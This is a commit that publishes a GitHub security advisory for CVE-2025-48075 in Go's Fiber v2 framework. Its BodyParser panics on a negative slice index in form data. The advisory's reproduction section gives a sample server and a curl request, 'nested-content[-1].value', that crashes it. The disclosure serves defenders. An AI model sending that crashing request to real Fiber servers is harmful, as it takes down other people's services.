Publish GHSA-hg3g-gphw-5hhm

Author: advisory-database[bot]

advisories/github-reviewed/2025/05/GHSA-hg3g-gphw-5hhm/GHSA-hg3g-gphw-5hhm.json

@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-hg3g-gphw-5hhm",
+  "modified": "2025-05-22T20:08:31Z",
+  "published": "2025-05-22T20:08:31Z",
+  "aliases": [
+    "CVE-2025-48075"
+  ],
+  "summary": "Fiber panics when fiber.Ctx.BodyParser parses invalid range index",
+  "details": "### Summary\nWhen using the `fiber.Ctx.BodyParser` to parse into a struct with range values, a panic occurs when trying to parse a negative range index\n\n### Details\n`fiber.Ctx.BodyParser` can map flat data to nested slices using `key[idx]value` syntax, however when idx is negative, it causes a panic instead of returning an error stating it cannot process the data. \n\nSince this data is user-provided, this could lead to denial of service for anyone relying on this `fiber.Ctx.BodyParser`  functionality  \n\n### Reproducing\nTake a simple GoFiberV2 server which returns a JSON encoded version of the FormData\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/gofiber/fiber/v2\"\n)\n\ntype RequestBody struct {\n\tNestedContent []*struct {\n\t\tValue string `form:\"value\"`\n\t} `form:\"nested-content\"`\n}\n\nfunc main() {\n\tapp := fiber.New()\n\n\tapp.Post(\"/\", func(c *fiber.Ctx) error {\n\t\tformData := RequestBody{}\n\t\tif err := c.BodyParser(&formData); err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn c.SendStatus(http.StatusUnprocessableEntity)\n\t\t}\n                c.Set(\"Content-Type\", \"application/json\")\n                s, _ := json.Marshal(formData)\n                return c.SendString(string(s))\n\t})\n\n\tfmt.Println(app.Listen(\":3000\"))\n}\n\n```\n\n**Correct Behaviour**\nSend a valid request such as:\n```bash\ncurl --location 'localhost:3000' \\\n--form 'nested-content[0].value=\"Foo\"' \\\n--form 'nested-content[1].value=\"Bar\"'\n```\nYou recieve valid JSON\n```json\n{\"NestedContent\":[{\"Value\":\"Foo\"},{\"Value\":\"Bar\"}]}\n```\n\n**Crashing behaviour**\nSend an invalid request such as:\n```bash\ncurl --location 'localhost:3000' \\\n--form 'nested-content[-1].value=\"Foo\"'\n```\nThe server panics and crashes\n```\npanic: reflect: slice index out of range\n\ngoroutine 8 [running]:\nreflect.Value.Index({0x738000?, 0xc000010858?, 0x0?}, 0x738000?)\n        /usr/lib/go-1.24/src/reflect/value.go:1418 +0x167\ngithub.com/gofiber/fiber/v2/internal/schema.(*Decoder).decode(0xc00002c570, {0x75d420?, 0xc000010858?, 0x7ff424822108?}, {0xc00001c498, 0x17}, {0xc00014e2d0, 0x2, 0x2}, {0xc00002c710, ...})\n[...]\n```\n\n### Impact\nAnyone using `fiber.Ctx.BodyParser` can/will have their servers crashed when an invalid payload is sent",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/gofiber/fiber/v2"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "2.52.6"
+            },
+            {
+              "fixed": "2.52.7"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/gofiber/fiber/security/advisories/GHSA-hg3g-gphw-5hhm"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48075"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/gofiber/fiber/commit/e115c08b8f059a4a031b492aa9eef0712411853d"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/gofiber/fiber"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-129"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-05-22T20:08:31Z",
+    "nvd_published_at": "2025-05-22T18:15:43Z"
+  }
+}